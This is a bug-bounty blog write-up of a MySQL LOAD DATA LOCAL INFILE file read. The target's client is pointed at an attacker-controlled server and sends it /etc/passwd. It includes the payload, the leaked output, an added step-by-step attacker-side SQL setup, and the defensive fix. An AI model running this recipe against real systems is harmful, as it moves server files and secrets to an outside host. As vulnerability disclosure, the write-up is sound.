This blog post describes one of my findings on a private program. The attack vector is simple, short and elegant (at least for me).

Simplicity is the ultimate sophistication.

One day, HackerOne asked me to join a private program. OK. I decided to have a look.

After creating a test account, I was asked to fill in the data-source information:

Database connection parameters are required! (The website frontend has been changed to protect the program's privacy.)

The application embeds a MySQL client that connects to whatever MySQL server the user specifies and runs the SQL the user supplies. The key point is that LOAD DATA LOCAL INFILE reads the named file on the client side, which here is the application's own host, and ships its contents to the server. Pointing that client at a server I control therefore turns it into an arbitrary file read. (It only works when the client has LOCAL INFILE enabled, so the practical fix is to disable it in the client, and not to run user-supplied SQL against user-supplied hosts at all.) So I created a new user, database and table on my server, opened the MySQL port to the target, and put this payload in the SQL SELECT box:

LOAD DATA LOCAL INFILE '/etc/passwd' INTO TABLE dadadb.dadatable FIELDS TERMINATED BY "\n"

Then I sent the request, and the contents of /etc/passwd from the target's application server landed in the table on my MySQL server:

mysql> select * from test;
+----------------------------------------------+
| value                                        |
+----------------------------------------------+
| root:x:0:0:root:/root:/bin/bash              |
| ...                                          |
+----------------------------------------------+
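The attacker-side setup that the steps above describe, written out as an added example (this is not code from the original post). The database, table and user names follow the payload above and are assumptions; the password and the target's address are placeholders. It also shows the server-side check a practitioner wants: the receiving server must have local_infile switched on, or the LOAD DATA LOCAL statement is rejected before the client ever opens the file.

```sql
-- Added example: attacker-side MySQL setup for the LOAD DATA LOCAL INFILE file read.
-- Run these on the MySQL server you control, which the target's client will connect to.
-- dadadb / dadatable / dadauser are assumed names taken from the payload in the post;
-- 'change-me' and 203.0.113.10 (the target's egress address) are placeholders.

-- 1. The receiving server must accept LOCAL INFILE; MySQL 8.0 ships with it OFF.
--    Without this the server answers the LOAD DATA LOCAL statement with an error
--    and the client never reads the file.
SET GLOBAL local_infile = 1;
SHOW GLOBAL VARIABLES LIKE 'local_infile';   -- expect: local_infile | ON

-- 2. Destination database and a single-column table: with FIELDS TERMINATED BY '\n'
--    every line of the retrieved file becomes one row in this column.
CREATE DATABASE IF NOT EXISTS dadadb;
CREATE TABLE IF NOT EXISTS dadadb.dadatable (
    value TEXT
);

-- 3. The account the target application will log in with.
--    LOAD DATA LOCAL needs only INSERT on the table (the FILE privilege is for
--    server-side, non-LOCAL loads). Restricting the host to the target's address
--    keeps other people from using your open MySQL port.
CREATE USER IF NOT EXISTS 'dadauser'@'203.0.113.10' IDENTIFIED BY 'change-me';
GRANT INSERT, SELECT ON dadadb.* TO 'dadauser'@'203.0.113.10';
FLUSH PRIVILEGES;

-- 4. The statement submitted through the application's SQL box. It executes in the
--    target's MySQL client, so '/etc/passwd' is resolved on the application host,
--    and any file that process can read (for example its own configuration) works.
LOAD DATA LOCAL INFILE '/etc/passwd'
    INTO TABLE dadadb.dadatable
    FIELDS TERMINATED BY '\n';

-- 5. Read the result back on your own server.
SELECT value FROM dadadb.dadatable;
```

The statement in step 4 is the only part that runs on the target side; everything else is plain server administration on the box you own. If the target's client has LOCAL INFILE disabled, step 4 fails with "The used command is not allowed with this MySQL version" and no file leaves the host, which is exactly the check a defender should be making on any client that connects to user-chosen servers.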

I submitted the report and got the bounty.


If you like my sharing, please consider buying me a coffee. ☕️
